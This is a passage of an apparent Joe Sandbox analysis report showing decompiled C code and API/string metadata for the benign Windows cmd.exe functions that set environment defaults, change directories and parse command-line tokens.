                                    				struct HINSTANCE__* _t81;
                                    				void* _t85;
                                    				int* _t88;
                                    				void* _t89;
                                    				struct HINSTANCE__* _t91;
                                    				struct HINSTANCE__* _t96;
                                    				signed int _t98;
                                    
                                    				_t30 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t30 ^ _t98;
                                    				_t91 = 0;
                                    				_v12 = 0x104;
                                    				_v20 = 0;
                                    				_v16 = 1;
                                    				memset( &_v540, 0, 0x104);
                                    				if(E011E0C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					do {
                                    						__eflags = E011E4B60(__eflags, 0);
                                    					} while (__eflags == 0);
                                    					exit(1);
                                    					L13:
                                    					_t41 =  &_v540;
                                    					L2:
                                    					GetModuleFileNameW(_t91, _t41, _v12);
                                    					if(E011DCFBC(L"PATH") == 0) {
                                    						E011E3A50(L"PATH", 0x11d24ac);
                                    					}
                                    					if(E011DCFBC(L"PATHEXT") == 0) {
                                    						E011E3A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
                                    					}
                                    					_t95 = L"PROMPT";
                                    					if(E011DCFBC(L"PROMPT") == 0) {
                                    						E011E3A50(L"PROMPT", L"$P$G");
                                    					}
                                    					if(E011DCFBC(L"COMSPEC") == 0) {
                                    						_t68 = _v20;
                                    						__eflags = _v20;
                                    						if(_v20 == 0) {
                                    							_t68 =  &_v540;
                                    						}
                                    						_t85 = 0x2e;
                                    						_t50 = E011DD7D4(_t68, _t85);
                                    						__eflags = _t50;
                                    						if(_t50 != 0) {
                                    							L33:
                                    							_t86 = _v20;
                                    							__eflags = _v20;
                                    							if(_v20 == 0) {
                                    								_t86 =  &_v540;
                                    							}
                                    							E011E3A50(L"COMSPEC", _t86);
                                    							goto L6;
                                    						} else {
                                    							__imp___wcsupr(L"CMD.EXE");
                                    							_t78 = _v20;
                                    							_t96 = _t78;
                                    							__eflags = _t78;
                                    							if(_t78 == 0) {
                                    								_t96 =  &_v540;
                                    							}
                                    							_t88 =  &(_t96->i);
                                    							do {
                                    								_t55 = _t96->i;
                                    								_t96 =  &(_t96->i);
                                    								__eflags = _t55 - _t91;
                                    							} while (_t55 != _t91);
                                    							_t91 = _t78;
                                    							_t95 = _t96 - _t88 >> 1;
                                    							__eflags = _t78;
                                    							if(_t78 == 0) {
                                    								_t91 =  &_v540;
                                    								_t78 = _t91;
                                    							}
                                    							_t89 = 0x5c;
                                    							_t56 = E011E2349(_t78, _t89);
                                    							_t79 = _t95 - 1;
                                    							__eflags = _t91 + _t79 * 2 - _t56;
                                    							_t81 = _v20;
                                    							if(_t91 + _t79 * 2 == _t56) {
                                    								__eflags = _t81;
                                    								if(_t81 == 0) {
                                    									_t81 =  &_v540;
                                    								}
                                    								_push(L"CMD.EXE");
                                    							} else {
                                    								__eflags = _t81;
                                    								if(_t81 == 0) {
                                    									_t81 =  &_v540;
                                    								}
                                    								_push(L"\\CMD.EXE");
                                    							}
                                    							E011E18C0(_t81, _v12);
                                    							goto L33;
                                    						}
                                    					} else {
                                    						L6:
                                    						_t52 = E011DCFBC(L"KEYS");
                                    						if(_t52 != 0) {
                                    							__imp___wcsicmp(_t52, L"ON");
                                    							__eflags = _t52;
                                    							if(__eflags == 0) {
                                    								 *0x121852c = 1;
                                    							}
                                    						}
                                    						_t73 =  *0x1213cb8;
                                    						_t109 =  *0x1213cb8;
                                    						if( *0x1213cb8 == 0) {
                                    							_t73 = 0x1213ab0;
                                    						}
                                    						_t53 = E011E33FC(1, _t73, 1, _t91, _t95, _t109);
                                    						__imp__??_V@YAXPAX@Z();
                                    						return E011E6FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
                                    					}
                                    				}
                                    				_t41 = _v20;
                                    				if(_t41 == 0) {
                                    					goto L13;
                                    				}
                                    				goto L2;
                                    			}





























                                    APIs
                                    • memset.MSVCRT ref: 011DCEDD
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 011DCF19
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD005
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD01B
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD031
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD047
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD05D
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD073
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD085
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD09B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DCF8F
                                    • exit.MSVCRT ref: 011EB424
                                    • _wcsupr.MSVCRT ref: 011EB475
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                    • API String ID: 2336066422-4197029667
                                    • Opcode ID: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction ID: b3eeafd94dc2fe9e9e3be91e5d79259d8d0dbc66d93d7a167d8106944e83d4a4
                                    • Opcode Fuzzy Hash: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction Fuzzy Hash: 6651E531B0461A97DF2CDBA5985C6FFB7A5EFA0108B04449DE817A3184DF349D45CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E011E33FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
                                    				void* _t75;
                                    				short _t86;
                                    				WCHAR* _t87;
                                    				WCHAR* _t88;
                                    				signed short* _t90;
                                    				short _t93;
                                    				int _t94;
                                    				WCHAR* _t96;
                                    				WCHAR* _t105;
                                    				short _t109;
                                    				WCHAR* _t113;
                                    				WCHAR* _t115;
                                    				WCHAR* _t125;
                                    				signed int _t126;
                                    				void* _t131;
                                    				WCHAR* _t142;
                                    				WCHAR* _t145;
                                    				WCHAR* _t153;
                                    				short* _t164;
                                    				WCHAR* _t166;
                                    				signed int _t168;
                                    				WCHAR* _t169;
                                    				short* _t176;
                                    				void* _t177;
                                    
                                    				_t173 = __edi;
                                    				_t135 = __ebx;
                                    				_push(0x240);
                                    				_push(0x11fbdd8);
                                    				E011E75CC(__ebx, __edi, __esi);
                                    				 *(_t177 - 0x24c) = __edx;
                                    				_t175 = __ecx;
                                    				_t75 = 0x5c;
                                    				if( *((intOrPtr*)(__ecx)) == _t75) {
                                    					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
                                    						goto L1;
                                    					} else {
                                    					}
                                    				} else {
                                    					L1:
                                    					E011E0D51(_t177 - 0x244);
                                    					if(E011E0C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    						L52:
                                    						E011E0DE8(_t82, _t177 - 0x244);
                                    						goto L54;
                                    					} else {
                                    						_t173 = E011DDF40(_t175);
                                    						 *(_t177 - 0x250) = _t173;
                                    						if(_t173 == 0) {
                                    							goto L52;
                                    						} else {
                                    							 *((intOrPtr*)(_t177 - 4)) = 0;
                                    							_t142 = _t173;
                                    							_t9 =  &(_t142[1]); // 0x2
                                    							_t164 = _t9;
                                    							do {
                                    								_t86 =  *_t142;
                                    								_t142 =  &(_t142[1]);
                                    							} while (_t86 != 0);
                                    							_t87 =  &(_t173[_t142 - _t164 >> 1]);
                                    							_t145 = _t87;
                                    							while(1) {
                                    								 *(_t177 - 0x248) = _t87;
                                    								if(_t145 <= _t173) {
                                    									break;
                                    								}
                                    								_t13 = _t87 - 2; // -4
                                    								_t145 = _t13;
                                    								if( *_t145 == 0x20) {
                                    									_t87 = _t145;
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							 *_t87 = 0;
                                    							_t88 =  *(_t177 - 0x3c);
                                    							if(_t88 == 0) {
                                    								_t88 = _t177 - 0x244;
                                    							}
                                    							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
                                    							_t90 =  *(_t177 - 0x3c);
                                    							if(_t90 == 0) {
                                    								_t90 = _t177 - 0x244;
                                    							}
                                    							_t135 = towupper( *_t90 & 0x0000ffff);
                                    							_t93 = 0x3d;
                                    							 *((short*)(_t177 - 0x28)) = _t93;
                                    							_t94 = iswalpha( *_t173 & 0x0000ffff);
                                    							_t175 = 0x3a;
                                    							if(_t94 == 0 || _t173[1] != _t175) {
                                    								 *((short*)(_t177 - 0x26)) = _t135;
                                    							} else {
                                    								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
                                    							}
                                    							 *(_t177 - 0x24) = _t175;
                                    							 *((short*)(_t177 - 0x22)) = 0;
                                    							_t96 =  *(_t177 - 0x3c);
                                    							if(_t96 == 0) {
                                    								_t96 = _t177 - 0x244;
                                    							}
                                    							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
                                    							if(_t97 == 0) {
                                    								L62:
                                    								_t175 = GetLastError();
                                    								goto L64;
                                    							} else {
                                    								if(_t97 >  *(_t177 - 0x34)) {
                                    									L65:
                                    									E011E0DE8(_t97, _t177 - 0x244);
                                    									_push(0xfffffffe);
                                    									_push(_t177 - 0x10);
                                    									_push(0x11fd0b4);
                                    									L011E82BB();
                                    								} else {
                                    									_t153 =  *(_t177 - 0x3c);
                                    									_t105 = _t153;
                                    									if(_t153 == 0) {
                                    										_t105 = _t177 - 0x244;
                                    									}
                                    									if( *_t105 == 0) {
                                    										L55:
                                    										E011E0DE8(_t105, _t177 - 0x244);
                                    										_push(0xfffffffe);
                                    										_push(_t177 - 0x10);
                                    										_push(0x11fd0b4);
                                    										L011E82BB();
                                    										_push(3);
                                    										goto L56;
                                    									} else {
                                    										if(_t153 == 0) {
                                    											_t105 = _t177 - 0x244;
                                    										}
                                    										if(_t105[1] != _t175) {
                                    											goto L55;
                                    										} else {
                                    											_t166 = _t153;
                                    											if(_t153 == 0) {
                                    												_t166 = _t177 - 0x244;
                                    											}
                                    											_t176 =  &(_t166[1]);
                                    											do {
                                    												_t109 =  *_t166;
                                    												_t166 =  &(_t166[1]);
                                    											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
                                    											_t168 = _t166 - _t176 >> 1;
                                    											if(_t153 == 0) {
                                    												_t153 = _t177 - 0x244;
                                    											}
                                    											_t169 =  &(_t153[_t168]);
                                    											while(1) {
                                    												_t175 = _t169;
                                    												 *(_t177 - 0x248) = _t169;
                                    												if(_t175 <= E011E6CF0(_t177 - 0x244) + 6) {
                                    													break;
                                    												}
                                    												_t131 = 0x5c;
                                    												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
                                    													_t169 = _t175 - 2;
                                    													continue;
                                    												}
                                    												break;
                                    											}
                                    											 *_t169 = 0;
                                    											_t113 =  *(_t177 - 0x3c);
                                    											if(_t113 == 0) {
                                    												_t113 = _t177 - 0x244;
                                    											}
                                    											if(GetFileAttributesW(_t113) == 0xffffffff) {
                                    												_t175 = GetLastError();
                                    												if(_t175 == 2 || _t175 == 3) {
                                    													goto L29;
                                    												} else {
                                    													if(_t175 != 0x7b) {
                                    														goto L64;
                                    													} else {
                                    														goto L29;
                                    													}
                                    												}
                                    											} else {
                                    												L29:
                                    												if( *0x1213cc9 == 0) {
                                    													L32:
                                    													_t175 =  *(_t177 - 0x24c);
                                    													if(_t175 == 2) {
                                    														L36:
                                    														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
                                    															_t115 =  *(_t177 - 0x3c);
                                    															if(_t115 == 0) {
                                    																_t115 = _t177 - 0x244;
                                    															}
                                    															if(SetCurrentDirectoryW(_t115) == 0) {
                                    																goto L62;
                                    															} else {
                                    																goto L41;
                                    															}
                                    														} else {
                                    															L41:
                                    															_t170 =  *(_t177 - 0x3c);
                                    															if( *(_t177 - 0x3c) == 0) {
                                    																_t170 = _t177 - 0x244;
                                    															}
                                    															if(E011E3A50(_t177 - 0x28, _t170) != 0) {
                                    																E011E0DE8(_t117, _t177 - 0x244);
                                    																_push(0xfffffffe);
                                    																_push(_t177 - 0x10);
                                    																_push(0x11fd0b4);
                                    																L011E82BB();
                                    																L54:
                                    																_push(8);
                                    																L56:
                                    															} else {
                                    																_t158 =  *0x1213cb8;
                                    																if( *0x1213cb8 == 0) {
                                    																	_t158 = 0x1213ab0;
                                    																}
                                    																E011E36CB(_t135, _t158,  *0x1213cc0, 0);
                                    																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
                                    																E011E0DE8(E011E36AC(_t173), _t177 - 0x244);
                                    															}
                                    														}
                                    													} else {
                                    														_t125 =  *(_t177 - 0x3c);
                                    														if(_t125 == 0) {
                                    															_t125 = _t177 - 0x244;
                                    														}
                                    														_t126 = GetFileAttributesW(_t125);
                                    														if(_t126 == 0xffffffff) {
                                    															_t98 = GetLastError();
                                    															_t175 = _t98;
                                    															if(_t98 == 2) {
                                    																_t175 = 3;
                                    															}
                                    															L64:
                                    															E011E0DE8(_t98, _t177 - 0x244);
                                    															_push(0xfffffffe);
                                    															_push(_t177 - 0x10);
                                    															_push(0x11fd0b4);
                                    															L011E82BB();
                                    														} else {
                                    															if((_t126 & 0x00000410) == 0) {
                                    																E011E0DE8(_t126, _t177 - 0x244);
                                    																_push(0xfffffffe);
                                    																_push(_t177 - 0x10);
                                    																_push(0x11fd0b4);
                                    																L011E82BB();
                                    															} else {
                                    																goto L36;
                                    															}
                                    														}
                                    													}
                                    												} else {
                                    													_t161 =  *(_t177 - 0x3c);
                                    													if( *(_t177 - 0x3c) == 0) {
                                    														_t161 = _t177 - 0x244;
                                    													}
                                    													if(E011E245C(_t161,  *(_t177 - 0x34), 0) == 0) {
                                    														goto L65;
                                    													} else {
                                    														goto L32;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return E011E7614(_t135, _t173, _t175);
                                    			}

                                    0x011edcc4
                                    0x011edcc5
                                    0x011edcca
                                    0x011e3626
                                    0x011e362b
                                    0x011edd92
                                    0x011edd97
                                    0x011edd9c
                                    0x011edd9d
                                    0x011edda2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e362b
                                    0x011e3620
                                    0x011e35e2
                                    0x011e35e2
                                    0x011e35e7
                                    0x011edd60
                                    0x011edd60
                                    0x011e35fa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e35fa
                                    0x011e35e0
                                    0x011e35d3
                                    0x011e3564
                                    0x011e3550
                                    0x011e3538
                                    0x011e352f
                                    0x011e3462
                                    0x011e344b
                                    0x011e36a3

                                    APIs
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?,?,?,?,?), ref: 011E34B1
                                    • towupper.MSVCRT ref: 011E34C6
                                    • iswalpha.MSVCRT ref: 011E34DB
                                    • towupper.MSVCRT ref: 011E34FB
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 011E3527
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E35CA
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E3617
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 011E3648
                                    • _local_unwind4.MSVCRT ref: 011EDC44
                                    • _local_unwind4.MSVCRT ref: 011EDC66
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                    • String ID:
                                    • API String ID: 2497804757-0
                                    • Opcode ID: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction ID: 53e1ceb35c4a0677ef4ab30f813ccce29622c1e74c3a517601df7f046761f210
                                    • Opcode Fuzzy Hash: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction Fuzzy Hash: F7B1E130E109169ADF2CEBE8E84CAFDB7F4FF14200F454569E52AD3290EB719A80CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E011DEA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
                                    				long _v8;
                                    				signed int _v12;
                                    				long _v16;
                                    				wchar_t* _v20;
                                    				long _v216;
                                    				signed int _v220;
                                    				signed int _v224;
                                    				signed int _v228;
                                    				signed int _v232;
                                    				long _v236;
                                    				char* _v260;
                                    				char _v264;
                                    				wchar_t* _v268;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t73;
                                    				signed int _t79;
                                    				signed short _t81;
                                    				signed int _t82;
                                    				long _t83;
                                    				wchar_t* _t85;
                                    				signed char _t86;
                                    				signed int _t87;
                                    				int _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				long _t94;
                                    				signed int _t96;
                                    				signed int _t104;
                                    				signed int _t105;
                                    				void* _t108;
                                    				signed int _t109;
                                    				signed int _t110;
                                    				signed int* _t113;
                                    				signed int _t114;
                                    				signed int _t115;
                                    				long _t116;
                                    				signed int _t118;
                                    				signed int _t121;
                                    				signed int _t123;
                                    				wchar_t* _t126;
                                    				intOrPtr _t127;
                                    				signed int _t128;
                                    				signed int _t129;
                                    				void* _t130;
                                    				long _t134;
                                    				wchar_t* _t135;
                                    				wchar_t* _t136;
                                    				signed int* _t137;
                                    				intOrPtr* _t138;
                                    				signed short* _t143;
                                    				long _t144;
                                    				long _t145;
                                    				signed int _t150;
                                    				signed int _t158;
                                    				signed int _t159;
                                    				long _t160;
                                    				long _t164;
                                    				void* _t169;
                                    				signed int _t172;
                                    				long _t173;
                                    				signed int _t177;
                                    				void* _t179;
                                    				signed int _t180;
                                    				signed int _t183;
                                    				signed short* _t185;
                                    				signed short* _t186;
                                    				long _t187;
                                    				signed int* _t188;
                                    				signed int _t190;
                                    				signed int _t191;
                                    				void* _t193;
                                    
                                    				_t167 = __edx;
                                    				_t138 = __ecx;
                                    				_t73 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _t73 ^ _t191;
                                    				_t186 = __ecx;
                                    				_t136 = __edx;
                                    				if(__ecx == 0) {
                                    					_t139 = 4;
                                    					_t75 = E011E00B0(4);
                                    					__eflags = _t75;
                                    					if(_t75 != 0) {
                                    						goto L23;
                                    					} else {
                                    						E011F9287(4);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						goto L95;
                                    					}
                                    				} else {
                                    					_t2 = _t138 + 2; // 0x2
                                    					_t179 = _t2;
                                    					do {
                                    						_t127 =  *_t138;
                                    						_t138 = _t138 + 2;
                                    					} while (_t127 != 0);
                                    					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
                                    					_t128 = E011E00B0(4 + (_t138 - _t179 >> 1) * 4);
                                    					_v236 = _t128;
                                    					if(_t128 == 0) {
                                    						L95:
                                    						E011F9287(_t139);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						goto L96;
                                    					} else {
                                    						_v228 = _t128;
                                    						_t185 = L"=,;";
                                    						_t129 = 0;
                                    						_v220 = 0;
                                    						while(1) {
                                    							_t164 =  *_t185 & 0x0000ffff;
                                    							_v224 = _t164;
                                    							if(_t164 == 0) {
                                    								break;
                                    							}
                                    							if(_t136 == 0) {
                                    								L9:
                                    								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
                                    								_t129 = _t129 + 1;
                                    								_v220 = _t129;
                                    							} else {
                                    								_t135 = wcschr(_t136, _t164);
                                    								_t193 = _t193 + 8;
                                    								_t129 = _v220;
                                    								if(_t135 == 0) {
                                    									_t164 = _v224;
                                    									goto L9;
                                    								}
                                    							}
                                    							_t185 =  &(_t185[1]);
                                    							if(_t129 < 0x63) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						_t183 = _v228;
                                    						_t130 = _t129 + _t129;
                                    						if(_t130 >= 0xc8) {
                                    							E011E711D(_t130, _t136, _t164, _t179, _t183, _t186);
                                    							asm("int3");
                                    							asm("int3");
                                    							asm("int3");
                                    							asm("int3");
                                    							asm("int3");
                                    							asm("int3");
                                    							_push(_t191);
                                    							_push(_t136);
                                    							_push(_t186);
                                    							_v264 = 0;
                                    							_push(_t183);
                                    							__eflags = 0;
                                    							_v260 =  &_v264;
                                    							_t136 = E011DE9A0(0, 0);
                                    							_v268 = _t136;
                                    							goto L62;
                                    						} else {
                                    							_v224 = 1;
                                    							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
                                    							_t134 =  *_t186 & 0x0000ffff;
                                    							_v220 = 1;
                                    							if(_t134 != 0) {
                                    								_t144 = _t134;
                                    								L14:
                                    								if(_t144 == 0x22) {
                                    									L17:
                                    									_v224 = 0;
                                    									if(_t136 == 0) {
                                    										L19:
                                    										 *_t180 =  *_t186;
                                    										_t180 = _t180 + 2;
                                    										if( *_t186 == 0x22) {
                                    											while(1) {
                                    												_t81 = _t186[1];
                                    												_t143 = _t186;
                                    												_t186 =  &(_t186[1]);
                                    												 *_t180 = _t81;
                                    												_t180 = _t180 + 2;
                                    												_t82 =  *_t186 & 0x0000ffff;
                                    												__eflags = _t82;
                                    												if(_t82 == 0) {
                                    													break;
                                    												}
                                    												__eflags = _t82 - 0x22;
                                    												if(_t82 == 0x22) {
                                    													goto L20;
                                    												} else {
                                    													__eflags = _t186[1];
                                    													if(_t186[1] != 0) {
                                    														continue;
                                    													} else {
                                    														goto L20;
                                    													}
                                    												}
                                    												goto L22;
                                    											}
                                    											_t186 = _t143;
                                    										}
                                    										L20:
                                    										_v220 = 0;
                                    									} else {
                                    										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
                                    										_t193 = _t193 + 8;
                                    										if(_t85 != 0) {
                                    											_t86 = _a4;
                                    											__eflags = _t86 & 0x00000002;
                                    											if((_t86 & 0x00000002) != 0) {
                                    												__eflags = _v220;
                                    												_t87 =  *_t186 & 0x0000ffff;
                                    												if(_v220 == 0) {
                                    													_t180 = _t180 + 2;
                                    												}
                                    												 *_t180 = _t87;
                                    												_v220 = 1;
                                    												_t180 = _t180 + 4;
                                    											} else {
                                    												__eflags = _t86 & 0x00000004;
                                    												if((_t86 & 0x00000004) != 0) {
                                    													 *_t180 =  *_t186;
                                    												}
                                    												_v220 = 0;
                                    												_t180 = _t180 + 2;
                                    											}
                                    										} else {
                                    											goto L19;
                                    										}
                                    									}
                                    									_t83 = _t186[1] & 0x0000ffff;
                                    									_t186 =  &(_t186[1]);
                                    									_t144 = _t83;
                                    									if(_t83 != 0) {
                                    										goto L14;
                                    									}
                                    								} else {
                                    									_t89 = iswspace(_t144);
                                    									_t193 = _t193 + 4;
                                    									if(_t89 != 0) {
                                    										L24:
                                    										_t90 = _a4;
                                    										__eflags = _t90 & 0x00000001;
                                    										if((_t90 & 0x00000001) != 0) {
                                    											__eflags = _v224;
                                    											if(_v224 == 0) {
                                    												goto L17;
                                    											} else {
                                    												goto L25;
                                    											}
                                    										} else {
                                    											L25:
                                    											_t91 = _t90 & 0x00000002;
                                    											__eflags = _t91;
                                    											_v228 = _t91;
                                    											if(_t91 == 0) {
                                    												L28:
                                    												_t93 = _a4 & 0x00000004;
                                    												__eflags = _t93;
                                    												_v232 = _t93;
                                    												if(_t93 != 0) {
                                    													L96:
                                    													_t79 = E011DD7D4(_t136,  *_t186);
                                    													__eflags = _t79;
                                    													if(_t79 != 0) {
                                    														goto L17;
                                    													} else {
                                    														goto L29;
                                    													}
                                    												} else {
                                    													L29:
                                    													_t94 =  *_t186 & 0x0000ffff;
                                    													__eflags = _t94;
                                    													if(_t94 != 0) {
                                    														_t160 = _t94;
                                    														while(1) {
                                    															__eflags = _t160 - 0x22;
                                    															if(_t160 == 0x22) {
                                    																break;
                                    															}
                                    															_t114 = iswspace(_t160);
                                    															_t193 = _t193 + 4;
                                    															__eflags = _t114;
                                    															if(_t114 != 0) {
                                    																L39:
                                    																__eflags = _v228;
                                    																if(_v228 == 0) {
                                    																	L42:
                                    																	__eflags = _v232;
                                    																	if(_v232 != 0) {
                                    																		_t115 = E011DD7D4(_t136,  *_t186);
                                    																		__eflags = _t115;
                                    																		if(_t115 != 0) {
                                    																			break;
                                    																		} else {
                                    																			goto L43;
                                    																		}
                                    																	} else {
                                    																		L43:
                                    																		_t116 = _t186[1] & 0x0000ffff;
                                    																		_t186 =  &(_t186[1]);
                                    																		_t160 = _t116;
                                    																		__eflags = _t116;
                                    																		if(_t116 != 0) {
                                    																			continue;
                                    																		} else {
                                    																		}
                                    																	}
                                    																} else {
                                    																	__eflags = _t136;
                                    																	if(_t136 == 0) {
                                    																		goto L42;
                                    																	} else {
                                    																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
                                    																		_t193 = _t193 + 8;
                                    																		__eflags = _t118;
                                    																		if(_t118 != 0) {
                                    																			break;
                                    																		} else {
                                    																			goto L42;
                                    																		}
                                    																	}
                                    																}
                                    															} else {
                                    																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
                                    																_t193 = _t193 + 8;
                                    																__eflags = _t121;
                                    																if(_t121 != 0) {
                                    																	goto L39;
                                    																} else {
                                    																	break;
                                    																}
                                    															}
                                    															goto L22;
                                    														}
                                    														__eflags =  *_t186;
                                    														if( *_t186 != 0) {
                                    															__eflags = _v224;
                                    															if(_v224 == 0) {
                                    																__eflags = _v220;
                                    																if(_v220 == 0) {
                                    																	_t180 = _t180 + 2;
                                    																	__eflags = _t180;
                                    																}
                                    															}
                                    															_v220 = 1;
                                    															goto L17;
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												__eflags = _t136;
                                    												if(_t136 == 0) {
                                    													goto L28;
                                    												} else {
                                    													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
                                    													_t193 = _t193 + 8;
                                    													__eflags = _t123;
                                    													if(_t123 != 0) {
                                    														goto L17;
                                    													} else {
                                    														goto L28;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
                                    										_t193 = _t193 + 8;
                                    										if(_t126 != 0) {
                                    											goto L24;
                                    										} else {
                                    											goto L17;
                                    										}
                                    									}
                                    								}
                                    							}
                                    							L22:
                                    							_t145 = _v236;
                                    							_t180 = _t180 - _t145 >> 1;
                                    							_t167 = 4 + _t180 * 2;
                                    							if(E011E0100(_t145, 4 + _t180 * 2) == 0) {
                                    								E011F9287(_t145);
                                    								__imp__longjmp(0x120b8b8, 1);
                                    								asm("int3");
                                    								L102:
                                    								_t169 = _t145 + 2;
                                    								do {
                                    									_t96 =  *_t145;
                                    									_t145 = _t145 + 2;
                                    									__eflags = _t96;
                                    								} while (_t96 != 0);
                                    								_t183 = _t180 + (_t145 - _t169 >> 1);
                                    								L68:
                                    								_t148 = _t183 + _t183;
                                    								_t187 = E011E00B0(_t183 + _t183);
                                    								_v8 = _t187;
                                    								__eflags = _t187;
                                    								if(_t187 == 0) {
                                    									E011F9287(_t148);
                                    									__imp__longjmp(0x120b8b8, 1);
                                    									asm("int3");
                                    									__eflags =  *0x120fa90;
                                    									if( *0x120fa90 != 0) {
                                    										E011F82EB(_t148);
                                    									}
                                    									__eflags = 0;
                                    									__eflags =  *0x120fa88;
                                    									 *0x11fd5c8 = 0;
                                    									if( *0x120fa88 != 0) {
                                    										E011F8121(_t187, 0);
                                    									}
                                    									return _t187;
                                    								}
                                    								_t150 = _t136[0xf];
                                    								__eflags = _t150;
                                    								if(_t150 != 0) {
                                    									E011E1040(_t187, _t183, _t150);
                                    								}
                                    								_t104 = 0;
